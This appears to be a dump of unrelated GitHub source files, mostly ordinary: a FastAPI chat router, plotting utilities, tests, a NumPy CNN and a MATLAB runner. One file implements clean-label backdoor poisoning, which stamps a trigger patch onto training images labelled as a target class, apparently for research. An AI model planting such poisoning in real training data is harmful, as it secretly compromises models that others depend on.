main()\n","repo_name":"lwh625382032/MBNet_pytorch","sub_path":"MBNet_PyTorch/auto_test.py","file_name":"auto_test.py","file_ext":"py","file_size_in_byte":6279,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"23200046204","text":"from typing import List\n\nfrom dependency_injector.wiring import Provide, inject\nfrom fastapi import APIRouter, Depends, Security, status\n\nfrom app.internal.services import Services\nfrom app.internal.services.message import MessageService\nfrom app.pkg import models\nfrom app.pkg.jwt import JwtAuthorizationCredentials, access_security\n\nrouter = APIRouter(prefix=\"/message\", tags=[\"Message\"])\n\n__all__ = [\"router\"]\n\n\n@router.get(\n \"/\",\n response_model=List[models.Message],\n status_code=status.HTTP_200_OK,\n description=\"Get all messages\",\n)\n@inject\nasync def read_all_room_messages(\n query: models.ReadAllRoomMessagesQuery = Depends(),\n message_service: MessageService = Depends(Provide[Services.message_service]),\n credentials: JwtAuthorizationCredentials = Security(access_security),\n):\n query.user_id = credentials.subject.get(\"user_id\")\n\n return await message_service.read_all_room_messages(\n query=query,\n )\n\n\n@router.post(\n \"/\",\n response_model=models.Message,\n status_code=status.HTTP_201_CREATED,\n description=\"Create message\",\n)\n@inject\nasync def create_message(\n cmd: models.CreateMessageCommand,\n message_service: MessageService = Depends(Provide[Services.message_service]),\n credentials: JwtAuthorizationCredentials = Security(access_security),\n):\n cmd.user_id = credentials.subject.get(\"user_id\")\n\n return await message_service.create_message(cmd=cmd)\n\n\n@router.get(\n \"/{message_id:int}\",\n response_model=models.Message,\n status_code=status.HTTP_200_OK,\n description=\"Read specific message\",\n)\n@inject\nasync def read_message(\n message_id: int = models.MessageFields.id,\n message_service: MessageService = Depends(Provide[Services.message_service]),\n credentials: JwtAuthorizationCredentials = Security(access_security),\n):\n return await message_service.read_message(\n query=models.ReadMessageQuery(\n id=message_id,\n user_id=credentials.subject.get(\"user_id\"),\n ),\n )\n\n\n@router.put(\n \"/{message_id:int}\",\n response_model=models.Message,\n status_code=status.HTTP_200_OK,\n description=\"Update specific message\",\n)\n@inject\nasync def update_message(\n cmd: models.UpdateMessageCommand,\n message_service: MessageService = Depends(Provide[Services.message_service]),\n credentials: JwtAuthorizationCredentials = Security(access_security),\n):\n cmd.user_id = credentials.subject.get(\"user_id\")\n\n return await message_service.update_message(cmd=cmd)\n\n\n@router.delete(\n \"/{message_id:int}\",\n response_model=models.Message,\n status_code=status.HTTP_200_OK,\n description=\"Delete specific message\",\n)\n@inject\nasync def delete_message(\n message_id: int = models.MessageFields.id,\n message_service: MessageService = Depends(Provide[Services.message_service]),\n credentials: JwtAuthorizationCredentials = Security(access_security),\n):\n return await message_service.delete_message(\n cmd=models.DeleteMessageCommand(\n id=message_id,\n user_id=credentials.subject.get(\"user_id\"),\n ),\n )\n","repo_name":"kylr42/chat-api","sub_path":"app/internal/routes/message.py","file_name":"message.py","file_ext":"py","file_size_in_byte":3093,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"44023459901","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mon Mar 25 23:37:36 2019\n\n@author: giudittaparolini\n\"\"\"\n\"\"\" \nThese are utilities methods called by main_part1. The utilities include methods to store prints and plots in the correct subfolder, save data to a dictionary \n\n\"\"\"\n\n\nimport os\nimport matplotlib.pyplot as plt\nimport csv\nimport itertools\nimport data_methods_part1 as dm\nimport pickle\n\n\n##########################################\n#Print methods\n\n# Print to a csv file in the folder 1_data\ndef print_csv_data (df, filename):\n df.to_csv(os.path.join(\"..\", \"1_data\", filename))\n\n\n#1 Print to a txt file in the folder 3_printouts\ndef print_txt_printouts (to_be_printed, filename):\n with open(os.path.join(\"..\", \"3_printouts\",\"part1\", filename),'w') as outfile:\n for item in to_be_printed:\n print(item, file=outfile)\n \n# Print to a csv file in the folder 3_printouts\ndef print_csv_printouts (df, filename):\n df.to_csv(os.path.join(\"..\", \"3_printouts\",\"part1\", filename), header=None)\n\n# Print a jpg figure in the folder 4_plots\ndef print_plot (fig, filename):\n plt.savefig(os.path.join(\"..\", \"4_plots\", \"part1\", filename))\n \ndef print_csv_data_headers (df, filename):\n df.to_csv(os.path.join(\"..\", \"1_data\", \"papers\", filename), header=df.columns)\n\n###########################################\n#Dictionary methods\n\n#Save a dictionary\ndef save_dict(my_dict):\n pickle_out = open(os.path.join(\"..\", \"3_printouts\", \"part1\", \"coathours_dict.pickle\"),\"wb\")\n pickle.dump(my_dict, pickle_out)\n pickle_out.close()\n\ndef print_coaut_dict(picklefile, filename):\n pickle_in = open(os.path.join(\"..\", \"3_printouts\", \"part1\", \"coathours_dict.pickle\"),\"rb\")\n my_dict = pickle.load(pickle_in)\n my_keys = my_dict.keys()\n my_keys_sorted = sorted(my_keys)\n with open(os.path.join(\"..\", \"3_printouts\", \"part1\", filename),'w') as outfile:\n for key in sorted(my_keys_sorted):\n print (\"Coauthor(s) of \" + key + \": \", my_dict[key], file=outfile)\n \n###########################################\n#Methods for aggregating data related to language counts (necessary to plot a readable pie chart) \n\n#Get the list of the language counts\ndef lang_count_list():\n with open(os.path.join(\"..\", \"3_printouts\", \"part1\", \"lang_counts.csv\")) as f:\n reader = csv.reader(f)\n my_list = list(reader)\n return my_list\n \n#Select the first 5 languages with highest counts\ndef main_lang_list():\n with open(os.path.join(\"..\", \"3_printouts\", \"part1\", \"lang_counts.csv\")) as f:\n reader = csv.reader(f)\n my_list = list(reader)\n my_list = lang_count_list()\n agg_list = []\n for item in my_list[0:5]:\n agg_list.append(item)\n return agg_list\n\n#Sum the remaining counts in the language counts list\ndef other_count():\n my_list = lang_count_list()\n other_list = my_list[5:]\n other_list = list(itertools.chain(*other_list))\n other_count_list = other_list[1::2]\n other_count = [ int(x) for x in other_count_list ] \n others = sum(other_count)\n return others\n\n#Generate the aggregate list\ndef agg_list():\n agg_list = []\n main_lang = main_lang_list()\n for item in main_lang:\n agg_list.append(item)\n others = str(other_count())\n other_element = [[\"Other\", others]]\n for item in other_element:\n agg_list.append(item)\n return agg_list\n\n#Generate the pair Other, other_count\n#def jourcat_count_list():\n #with open(os.path.join(\"..\", \"3_printouts\", \"part1\", \"lang_counts.csv\")) as f:\n #reader = csv.reader(f)\n #my_list = list(reader)\n #return my_list\n \n###########################\n#Methods for aggregating data related to journal category counts (necessary to plot a readable pie chart) \n\n\n#Generate a new dataframe df3 starting with the full dataframe and the categories dataframe\ndef get_journal_cat(df,df_cat):\n df1 = df.loc[df[\"Item Type\"] == \"journalArticle\"]\n df2 = df_cat.drop([\"Category2\", \"Language\"], axis=1)\n df3 = df1.merge(df2, on=\"Publication Title\")\n df4 = dm.colval_to_int(df3, \"Publication Year\")\n return df4\n\n#Load the counts of the items in each category\ndef jcat_count_list():\n with open(os.path.join(\"..\", \"3_printouts\", \"part1\", \"jourcat_counts.csv\")) as f:\n reader = csv.reader(f)\n my_list = list(reader)\n return my_list\n\n#Select the first 5 categories with highest counts\ndef main_jcat_list():\n with open(os.path.join(\"..\", \"1_data\",\"df_jour_cat.csv\")) as f:\n reader = csv.reader(f)\n my_list = list(reader)\n my_list = jcat_count_list()\n agg_list = []\n for item in my_list[0:5]:\n agg_list.append(item)\n return agg_list\n\n#Sum the remaining counts in the category counts list\ndef other_jcat_count():\n my_list = jcat_count_list()\n other_list = my_list[5:]\n other_list = list(itertools.chain(*other_list))\n other_count_list = other_list[1::2]\n other_count = [ int(x) for x in other_count_list ] \n others = sum(other_count)\n return others\n\n#Generate the aggregate list\ndef agg_jcat_list():\n agg_list = []\n main_lang = main_jcat_list()\n for item in main_lang:\n agg_list.append(item)\n others = str(other_jcat_count())\n other_element = [[\"Other\", others]]\n for item in other_element:\n agg_list.append(item)\n return agg_list\n\n###########################\n#Methods for working with lists\n \n#Flatten lists\ndef flatten(lis):\n new_lis = []\n for item in lis:\n if type(item) == type([]):\n new_lis.extend(flatten(item))\n else:\n new_lis.append(item)\n return new_lis\n\n","repo_name":"GParolini/learn_IT_girls_python","sub_path":"2_code_scripts/utilities_part1.py","file_name":"utilities_part1.py","file_ext":"py","file_size_in_byte":5654,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"28906924302","text":"import os\nimport torch\nimport random\nfrom torchvision.utils import save_image\n\nclass poison_generator():\n\n def __init__(self, img_size, dataset, adv_imgs, poison_rate, trigger_mark, trigger_mask, path, target_class=0):\n\n self.img_size = img_size\n self.dataset = dataset\n self.adv_imgs = adv_imgs\n self.poison_rate = poison_rate\n # self.trigger = trigger\n self.trigger_mark = trigger_mark\n self.trigger_mask = trigger_mask\n self.path = path # path to save the dataset\n self.target_class = target_class # by default : target_class = 0\n\n # shape of the patch trigger\n self.dx, self.dy = trigger_mask.shape\n\n # number of images\n self.num_img = len(dataset)\n\n def generate_poisoned_training_set(self):\n\n # poison for placing trigger pattern\n posx = self.img_size - self.dx\n posy = self.img_size - self.dy\n\n # random sampling\n all_target_indices = []\n all_other_indices = []\n for i in range(self.num_img):\n _, gt = self.dataset[i]\n if gt == self.target_class:\n all_target_indices.append(i)\n else:\n all_other_indices.append(i)\n random.shuffle(all_target_indices)\n random.shuffle(all_other_indices)\n num_target = len(all_target_indices)\n num_poison = int(self.num_img * self.poison_rate)\n #assert num_poison < num_target\n \n\n poison_indices = all_target_indices[:num_poison]\n poison_indices.sort() # increasing order\n\n img_set = []\n label_set = []\n pt = 0\n for i in range(self.num_img):\n img, gt = self.dataset[i]\n\n if pt < num_poison and poison_indices[pt] == i:\n gt = self.target_class\n img = self.adv_imgs[i] # use the adversarial version of image i\n img = img + self.trigger_mask * (self.trigger_mark - img)\n pt+=1\n\n # img_file_name = '%d.png' % i\n # img_file_path = os.path.join(self.path, img_file_name)\n # save_image(img, img_file_path)\n # print('[Generate Poisoned Set] Save %s' % img_file_path)\n \n img_set.append(img.unsqueeze(0))\n label_set.append(gt)\n\n img_set = torch.cat(img_set, dim=0)\n label_set = torch.LongTensor(label_set)\n #print(\"Poison indices:\", poison_indices)\n return img_set, poison_indices, label_set\n\n\n\n\nclass poison_transform():\n def __init__(self, img_size, trigger_mark, trigger_mask, target_class=0):\n self.img_size = img_size\n self.target_class = target_class # by default : target_class = 0\n self.trigger_mark = trigger_mark\n self.trigger_mask = trigger_mask\n self.dx, self.dy = trigger_mask.shape\n\n def transform(self, data, labels):\n\n data = data.clone()\n labels = labels.clone()\n\n # transform clean samples to poison samples\n labels[:] = self.target_class\n data = data + self.trigger_mask.to(data.device) * (self.trigger_mark.to(data.device) - data)\n\n # debug\n # from torchvision.utils import save_image\n # from torchvision import transforms\n # # preprocess = transforms.Normalize([0.4914, 0.4822, 0.4465], [0.247, 0.243, 0.261])\n # reverse_preprocess = transforms.Normalize([-0.4914/0.247, -0.4822/0.243, -0.4465/0.261], [1/0.247, 1/0.243, 1/0.261])\n # save_image(reverse_preprocess(data)[-7], 'a.png')\n\n return data, labels","repo_name":"vtu81/backdoor-toolbox","sub_path":"poison_tool_box/clean_label.py","file_name":"clean_label.py","file_ext":"py","file_size_in_byte":3558,"program_lang":"python","lang":"en","doc_type":"code","stars":97,"dataset":"github-code","pt":"53"} +{"seq_id":"22867153319","text":"\n\n# LeetCode: 824. Goat Latin\n\ndef toGoatLatin(S: str) -> str:\n if len(S) == 0:\n return None\n l = []\n v = [\"a\",\"e\",\"i\",\"o\",\"u\",\"A\",\"E\",\"I\",\"O\",\"U\"]\n ct = 0\n\n for w in S.split(\" \"):\n ct += 1\n \n if w[:1] in v:\n l.append(w + \"ma\" + \"a\" * ct)\n else:\n l.append(w[1:] + w[:1] + \"ma\"+ \"a\" * ct)\n\n return \" \".join(l)\n\ns = \"I speak Goat Latin\"\nprint(toGoatLatin(s))\n\ns = \"The quick brown fox jumped over the lazy dog\"\nprint(toGoatLatin(s))\n","repo_name":"jcravener/PythonWorkroom","sub_path":"GoatLatin.py","file_name":"GoatLatin.py","file_ext":"py","file_size_in_byte":506,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"40075847348","text":"from Model.autoWatering import AutoWatering\nfrom Model.lawn import LawnProperties\nimport pymysql.cursors\n\nclass test():\n\n def mysqlConnection(self):\n connection = pymysql.connect(host=\"\",\n user=\"turfswach\",\n password=\"\",\n db=\"\",\n charset='utf8mb4',\n cursorclass=pymysql.cursors.DictCursor)\n if connection:\n return connection\n else:\n print(\"Connection expection error\")\n\n def turnWater(self, status, lawn):\n connection = self.mysqlConnection()\n try:\n with connection.cursor() as cursor:\n sql = \"Insert into logStatus (status, lawnID, city, country) VALUES (%s, %s, %s, %s)\"\n cursor.execute(sql, (status, lawn.lawnID, lawn.city, lawn.country))\n connection.commit()\n finally:\n connection.close()\n\ndef main():\n testWater = test()\n lawn1 = LawnProperties(1, \"vancouver\", \"canada\", \"1 Sennok Drive\", 10, 10, 0.75, 1.25,0)\n checkToIrrigate = AutoWatering(lawn1)\n\n if (checkToIrrigate.shouldWater):\n testWater.turnWater(\"1\", lawn1)\n else:\n testWater.turnWater(\"0\", lawn1)\n\nmain()\n","repo_name":"swachm/Turf","sub_path":"Model/testingOnOff.py","file_name":"testingOnOff.py","file_ext":"py","file_size_in_byte":1338,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"5851633704","text":"#!/usr/bin/env python3\n\"\"\"\nA unit test module for testing ``models/base_model.py`` module.\n\"\"\"\n\nimport unittest\nfrom models.base_model import BaseModel\nfrom datetime import datetime\n\n\nclass Test_BaseModel(unittest.TestCase):\n \"\"\"\n Test the basic features of the BaseModel class.\n \"\"\"\n\n def test_instance_uuid_is_unique(self):\n \"\"\"\n This method of this test class tests for exactly\n what the name of the method reads.\n \"\"\"\n base1 = BaseModel()\n base2 = BaseModel()\n self.assertNotEqual(base1.id, base2.id)\n\n def test_instance_created_at_is_str(self):\n \"\"\"\n This method of this test class tests for exactly\n what the name of the method reads.\n \"\"\"\n base1 = BaseModel()\n self.assertEqual(type(base1.created_at), datetime)\n\n def test_instance_updated_at_is_str(self):\n \"\"\"\n This method of this test class tests for exactly\n what the name of the method reads.\n \"\"\"\n base1 = BaseModel()\n self.assertEqual(type(base1.updated_at), datetime)\n\n def test_save_method(self):\n \"\"\"\n This method of this test class tests for exactly\n what the name of the method reads.\n \"\"\"\n from time import sleep\n base1 = BaseModel()\n sleep(2)\n base1.save()\n self.assertNotEqual(base1.created_at, base1.updated_at)\n\n def test_BaseModel_save_method(self):\n \"\"\"\n This method tests save method of the class\n BaseModel.\n \"\"\"\n BaseModel().save()\n\n def test_string_representation(self):\n \"\"\"\n This method of this test class tests for exactly\n what the name of the method reads.\n \"\"\"\n base1 = BaseModel()\n string = \"[{}] ({}) {}\".format(base1.__class__.__name__,\n base1.id, base1.__dict__)\n self.assertEqual(base1.__str__(), string)\n\n def test_instance_dictionary(self):\n \"\"\"\n This method of this test class tests for exactly\n what the name of the method reads.\n \"\"\"\n base1 = BaseModel()\n base1.name = \"New Instance variable\"\n self.assertTrue(\"__class__\" in base1.to_dict())\n self.assertTrue(\"id\" in base1.to_dict())\n self.assertTrue(\"created_at\" in base1.to_dict())\n self.assertTrue(\"updated_at\" in base1.to_dict())\n self.assertTrue(\"name\" in base1.to_dict())\n\n def test_new_instance_from_dictionary(self):\n \"\"\"\n This method of this test class tests for exactly\n what the name of the method reads.\n \"\"\"\n base1 = BaseModel()\n model_json = base1.to_dict()\n base2 = BaseModel(**model_json)\n self.assertFalse(base1 is base2)\n\n def test_new_instance_datetime_variables(self):\n \"\"\"\n This method of this test class tests for exactly\n what the name of the method reads.\n \"\"\"\n base1 = BaseModel()\n model_json = base1.to_dict()\n base2 = BaseModel(**model_json)\n self.assertEqual(type(base2.created_at), datetime)\n self.assertEqual(type(base2.updated_at), datetime)\n\n def test_new_instance_properties_against_old(self):\n \"\"\"\n This method of this test class tests for exactly\n what the name of the method reads.\n \"\"\"\n base1 = BaseModel()\n base1.name = \"New_Instance\"\n model_json = base1.to_dict()\n base2 = BaseModel(**model_json)\n self.assertEqual(type(base1), type(base2))\n self.assertEqual(base1.id, base2.id)\n self.assertEqual(base1.created_at, base2.created_at)\n self.assertEqual(base1.updated_at, base2.updated_at)\n self.assertEqual(base1.name, base2.name)","repo_name":"Njokujr/AirBnB_clone","sub_path":"tests/test_models/test_base_model.py","file_name":"test_base_model.py","file_ext":"py","file_size_in_byte":3757,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"20542019541","text":"import pickle\nimport numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\nfrom collections import OrderedDict\nfrom common.layers import Convolution, MaxPooling, ReLU, Affine, SoftmaxWithLoss\nfrom common.gradient import numerical_gradient\nfrom common.optimizer import RMSProp\n\ndef he(n1):\n \"\"\"\n Heの初期値を利用するための関数\n 返り値は、見かけの標準偏差\n \"\"\" \n return np.sqrt(2/n1)\n\n\nclass SimpleConvNet:\n def __init__(self, input_dim=(1, 28, 28), \n conv_param={'filter_num':30, 'filter_size':5, 'pad':0, 'stride':1},\n hidden_size=100, output_size=10, weight_init_std=0.01,weight_decay_lambda=0.01):\n \"\"\"\n input_size : 入力の配列形状(チャンネル数、画像の高さ、画像の幅)\n conv_param : 畳み込みの条件, dict形式  例、{'filter_num':30, 'filter_size':5, 'pad':0, 'stride':1}\n hidden_size : 隠れ層のノード数\n output_size : 出力層のノード数\n weight_init_std : 重みWを初期化する際に用いる標準偏差\n \"\"\"\n self.hidden_layer_num = 3\n self.weight_decay_lambda = weight_decay_lambda\n #filter_num = conv_param['filter_num']\n #filter_size = conv_param['filter_size']\n #filter_pad = conv_param['pad']\n #filter_stride = conv_param['stride']\n filter_num = 30\n filter_size = 5\n filter_pad = 0\n filter_stride = 1\n input_size = input_dim[1]\n conv_output_size = (input_size - filter_size + 2*filter_pad) / filter_stride + 1\n pool_output_size = int(filter_num * (conv_output_size/2) * (conv_output_size/2))\n\n # 重みの初期化\n self.params = {}\n std = weight_init_std\n self.params['W1'] = std * np.random.randn(filter_num, input_dim[0], filter_size, filter_size) # W1は畳み込みフィルターの重みになる\n self.params['b1'] = np.zeros(filter_num) #b1は畳み込みフィルターのバイアスになる\n #self.params['W2'] = std * np.random.randn(pool_output_size, hidden_size)\n self.params['b2'] = np.zeros(hidden_size)\n #self.params['W3'] = std * np.random.randn(hidden_size, output_size)\n self.params['b3'] = np.zeros(output_size)\n \n #Heの初期値を使用\n self.params['W2'] = np.random.randn(pool_output_size, hidden_size) * he(pool_output_size)\n self.params['W3'] = np.random.randn(hidden_size, output_size) * he(hidden_size)\n \n \n\n # レイヤの生成\n self.layers = OrderedDict()\n #self.layers['Conv1'] = Convolution(self.params['W1'], self.params['b1'],\n # conv_param['stride'], conv_param['pad']) # W1が畳み込みフィルターの重み, b1が畳み込みフィルターのバイアスになる\n self.layers['Conv1'] = Convolution(self.params['W1'], self.params['b1'],\n 1, 0) # W1が畳み込みフィルターの重み, b1が畳み込みフィルターのバイアスになる\n self.layers['ReLU1'] = ReLU()\n self.layers['Pool1'] = MaxPooling(pool_h=2, pool_w=2, stride=2)\n self.layers['Affine1'] = Affine(self.params['W2'], self.params['b2'])\n self.layers['ReLU2'] = ReLU()\n self.layers['Affine2'] = Affine(self.params['W3'], self.params['b3'])\n\n self.last_layer = SoftmaxWithLoss()\n\n def predict(self, x):\n for layer in self.layers.values():\n x = layer.forward(x)\n\n return x\n\n def loss(self, x, t):\n \"\"\"\n 損失関数\n x : 入力データ\n t : 教師データ\n \"\"\"\n y = self.predict(x)\n\n # 荷重減衰を考慮した損失を求める\n lmd = self.weight_decay_lambda \n weight_decay = 0\n for idx in range(1, self.hidden_layer_num + 1):\n W = self.params['W' + str(idx)]\n \n # 全ての行列Wについて、1/2* lambda * Σwij^2を求め、積算していく\n weight_decay += 0.5 * lmd * np.sum(W**2)\n\n return self.last_layer.forward(y, t) + weight_decay\n \n\n def accuracy(self, x, t, batch_size=100):\n if t.ndim != 1 : t = np.argmax(t, axis=1)\n \n acc = 0.0\n \n for i in range(int(x.shape[0] / batch_size)):\n tx = x[i*batch_size:(i+1)*batch_size]\n tt = t[i*batch_size:(i+1)*batch_size]\n y = self.predict(tx)\n y = np.argmax(y, axis=1)\n acc += np.sum(y == tt) \n \n return acc / x.shape[0]\n\n def gradient(self, x, t):\n \"\"\"勾配を求める(誤差逆伝播法)\n Parameters\n ----------\n x : 入力データ\n t : 教師データ\n\n 減衰を考慮した損失を求める\n lmd = self.weight_decay_lambda \n weight_decay = 0\n for idx in range(1, self.hidden_layer_num + 2):\n W = self.params['W' + str(idx)]\n \n # 全ての行列Wについて、1/2* lambda * Σwij^2を求め、積算していく\n weight_decay += 0.5 * lmd * np.sum(W**2)\n\n return self.lastLayer.forward(y, t) + weight_decay\n\n -------\n 各層の勾配を持ったディクショナリ変数\n grads['W1']、grads['W2']、...は各層の重み\n grads['b1']、grads['b2']、...は各層のバイアス\n \"\"\"\n # forward\n self.loss(x, t)\n\n # backward\n dout = 1\n dout = self.last_layer.backward(dout)\n\n layers = list(self.layers.values())\n layers.reverse()\n for layer in layers:\n dout = layer.backward(dout)\n\n # 設定\n # 荷重減衰を考慮しながら、dW, dbをgradsにまとめる\n lmd = self.weight_decay_lambda\n grads = {}\n grads['W1'], grads['b1'] = self.layers['Conv1'].dW, self.layers['Conv1'].db\n grads['W2'], grads['b2'] = self.layers['Affine1'].dW + lmd * self.layers['Affine1'].W, self.layers['Affine1'].db\n grads['W3'], grads['b3'] = self.layers['Affine2'].dW + lmd * self.layers['Affine2'].W, self.layers['Affine2'].db\n\n return grads\n \n def save_params(self, file_name=\"CNNparams.pkl\"):\n \n params = {}\n #for key, val in self.params.items():\n # params[key] = val\n\n print(\"W1Start\")\n params['W1'] = self.params['W1']\n print(\"b1Start\")\n params['b1'] = self.params['b1']\n print(\"W2Start\")\n params['W2'] = self.params['W2'] \n print(\"b2Start\")\n params['b2'] = self.params['b2']\n print(\"W3Start\")\n params['W3'] = self.params['W3'] \n print(\"b3Start\")\n params['b3'] = self.params['b3']\n \n with open(file_name, 'wb') as f:\n pickle.dump(params, f)\n \n def load_params(self, file_name=\"CNNparams.pkl\"):\n with open(file_name, 'rb') as f:\n params = pickle.load(f)\n #for key, val in params.items():\n # self.params[key] = val\n\n #for i, layer_idx in enumerate((0, 2, 5, 7, 10, 12, 15, 18)):\n # self.layers[layer_idx].W = self.params['W' + str(i+1)]\n # self.layers[layer_idx].b = self.params['b' + str(i+1)]\n self.params['W1'] = params['W1']\n self.params['b1'] = params['b1']\n self.params['W2'] = params['W2']\n self.params['b2'] = params['b2']\n self.params['W3'] = params['W3']\n self.params['b3'] = params['b3']\n\n def make_layers(self):\n # レイヤの生成\n self.layers = OrderedDict()\n self.layers['Conv1'] = Convolution(self.params['W1'], self.params['b1'],\n 1, 0) # W1が畳み込みフィルタの重み, b1が畳み込みフィルタのバイアスになる\n self.layers['ReLU1'] = ReLU()\n self.layers['Pool1'] = MaxPooling(pool_h=2, pool_w=2, stride=2)\n self.layers['Affine1'] = Affine(self.params['W2'], self.params['b2'])\n self.layers['ReLU2'] = ReLU()\n self.layers['Affine2'] = Affine(self.params['W3'], self.params['b3'])\n\n self.last_layer = SoftmaxWithLoss()\n ","repo_name":"sf-12/SkillUpAi-katakanaCNNmodel","sub_path":"node40 _dataNEW1_48000_wd1/CNN.py","file_name":"CNN.py","file_ext":"py","file_size_in_byte":8228,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"34097489126","text":"\"\"\"\n#############################\n# CompFigSep #\n# Compound Figure Separator #\n#############################\n\nGitHub: https://github.com/GaetanLepage/compound-figure-separator\n\nAuthor: Gaétan Lepage\nEmail: gaetan.lepage@grenoble-inp.fr\nDate: Spring 2020\n\nMaster's project @HES-SO (Sierre, SW)\n\nSupervisors: Henning Müller (henning.mueller@hevs.ch)\n Manfredo Atzori (manfredo.atzori@hevs.ch)\n\nCollaborators: Niccolò Marini (niccolo.marini@hevs.ch)\n Stefano Marchesin (stefano.marchesin@unipd.it)\n\n\n####################################################################################\nUse a figure generator for previewing a data set by displaying each image one by one\nalong with the annotations.\n\"\"\"\n\nfrom argparse import ArgumentParser\n\nfrom ..data.figure_generators import add_common_figure_generator_args, FigureGenerator\n\n\ndef add_viewer_args(parser: ArgumentParser) -> None:\n \"\"\"\n Add to the given parser the arguments relative to the preview options :\n * mode ('gt', 'pred' or 'both')\n * delay\n * save_preview\n\n Args:\n parser (ArgumentParser): An ArgumentParser.\n \"\"\"\n\n add_common_figure_generator_args(parser=parser)\n\n parser.add_argument(\n '--mode',\n help=\"mode: Select which information to display:\"\n \" ['gt': only the ground truth,\"\n \" 'pred': only the predictions,\"\n \" 'both': both predicted and ground truth annotations]\",\n default='both'\n )\n\n parser.add_argument(\n '--delay',\n help=\"The number of seconds after which the window is closed. If 0, the delay is disabled.\",\n type=int,\n default=100\n )\n\n parser.add_argument(\n '--display-in-terminal',\n help=\"Display the image in the terminal\",\n action='store_true'\n )\n\n parser.add_argument(\n '--save_preview',\n help=\"Save the image previews in image files.\",\n action='store_true'\n )\n\n\ndef view_data_set(\n figure_generator: FigureGenerator,\n mode: str = 'both',\n *,\n save_preview: bool = False,\n preview_folder: str = None,\n delay: int = 0,\n display_in_terminal: bool = False,\n window_name: str = None\n) -> None:\n \"\"\"\n Preview all the figures from a data set.\n The image is displayed along with the bounding boxes (panels and, if present, labels).\n\n Args:\n figure_generator (FigureGenerator): A generator of Figure objects.\n mode (str): Select which information to display:\n * 'gt': only the ground truth\n * 'pred': only the predictions\n * 'both': both predicted and ground truth\n annotations.\n save_preview (bool): If true, saves the preview as an image.\n preview_folder (str): The path to the folder where to store the preview\n images.\n delay (int): The number of seconds after which the window is\n closed if 0, the delay is disabled.\n display_in_terminal (bool): TODO\n window_name (str): Name of the image display window.\n \"\"\"\n\n for figure in figure_generator():\n\n figure.show_preview(mode=mode,\n delay=delay,\n display_in_terminal=display_in_terminal,\n window_name=window_name)\n\n if save_preview:\n figure.save_preview(folder=preview_folder)\n","repo_name":"GaetanLepage/compound-figure-separator","sub_path":"compfigsep/data/figure_viewer.py","file_name":"figure_viewer.py","file_ext":"py","file_size_in_byte":3776,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"15029806045","text":"# Import libraries needed for the program to run\nfrom datetime import datetime # Library that includes datetime in pandas format\nimport os #module that determines which module to load for path based on which operating system you have\nimport subprocess #module that runs new applications or programs by creating new processes \nimport sys #module that gives us information about constants, functions, and methods of the interpreter \nimport echo \n\n# Import additional specific functions written by Donata in file tools.py\nfrom tools import replace \nfrom itertools import product \n\n# Import specific functions written by Donata in file TC_and_TS_define_param.py\nfrom TC_and_TS_define_param import (\n year_pairs, # Returns ((2007, 2008), (2009, 2010))\n year_start_TC,year_end_TC, # Start: 2007 End: 2010\n matlab_path, # matlab directory\n grid_lower,grid_upper,grid_stride, #lower: 10, upper: 210, stride: 100\n window_size,min_num_obs, # Returns 8, 20\n var2use,center_month,OB, # Temperature, 9, Oceanic basins\n windowSizeGP,n_parpool, # 5, 1\n depth_layers, #3\n folder2use,\n case2use,\n )\n\n# List of Matlab programs to run\nlist2run = str(sys.argv)#['A05', 'A06','A07','A08','A09','A10','A11','A12'] #['A01', 'A02', 'A03', 'A04'] #\n\n# Define a function to run within python a script that was written in Matlab languge\ndef matlab_run(script: str, replacement_dict: dict = {}):\n timestamp = datetime.now()\n f_out = f\"temp_matlab_{datetime.now().strftime('%Y%m%d_%H%M%S')}.m\"\n replace(script, f_out, replacement_dict)\n proc=subprocess.run([\n matlab_path,\n '-nodisplay',\n '-nosplash',\n '-nodesktop',\n f'-r \"run(\\'{f_out}\\');exit;\"'\n ])\n if proc.returncode != 0:\n raise RuntimeError(f'Subprocess {f_out} exited with non-zero return '\n 'status.')\n # cleanup\n os.remove(f_out)\n return\n\n## A01: gridding, saves (temperature) observations from Argo profiles on 3 different pressure depths\nif ('A01' in list2run):\n print('>>>>>>>>>>>>>>>>>>>>>>>>A01')\n if case2use == 'ML':\n YEARS_LIST = year_pairs\n for YEARS in YEARS_LIST:\n matlab_run('A01_MixedLayer.m', {\n '<PY:YEARS>': f'{YEARS[0]}_{YEARS[1]}',\n '<PY:DATA_LOC>': '../Inputs/',\n '<PY:GRID_LOWER>': grid_lower,\n '<PY:GRID_UPPER>': grid_upper,\n '<PY:GRID_STRIDE>': grid_stride,\n '<PY:VAR2USE>': var2use,\n '<PY:FOLDER2USE>': folder2use,\n }) \n else: \n YEARS_LIST = year_pairs\n for YEARS in YEARS_LIST:\n matlab_run('A01_pchipGridding.m', {\n '<PY:YEARS>': f'{YEARS[0]}_{YEARS[1]}',\n '<PY:DATA_LOC>': '../Inputs/',\n '<PY:GRID_LOWER>': grid_lower,\n '<PY:GRID_UPPER>': grid_upper,\n '<PY:GRID_STRIDE>': grid_stride,\n '<PY:VAR2USE>': var2use,\n '<PY:FOLDER2USE>': folder2use,\n })\n\n## A02: concatenates arrays\nif ('A02' in list2run):\n print('>>>>>>>>>>>>>>>>>>>>>>>>A02')\n\n matlab_run('A02_concatenateArrays.m', {\n '<PY:YEARS>': f'{year_pairs}',\n '<PY:VAR2USE>': var2use,\n '<PY:FOLDER2USE>': folder2use, \n })\n\n## A03: creates data mask\nif ('A03' in list2run):\n print('>>>>>>>>>>>>>>>>>>>>>>>>A03')\n\n matlab_run('A03_createDataMask.m', {\n '<PY:WINDOW_SIZE>': window_size,\n '<PY:MIN_NUM_OBS>': min_num_obs,\n '<PY:VAR2USE>': 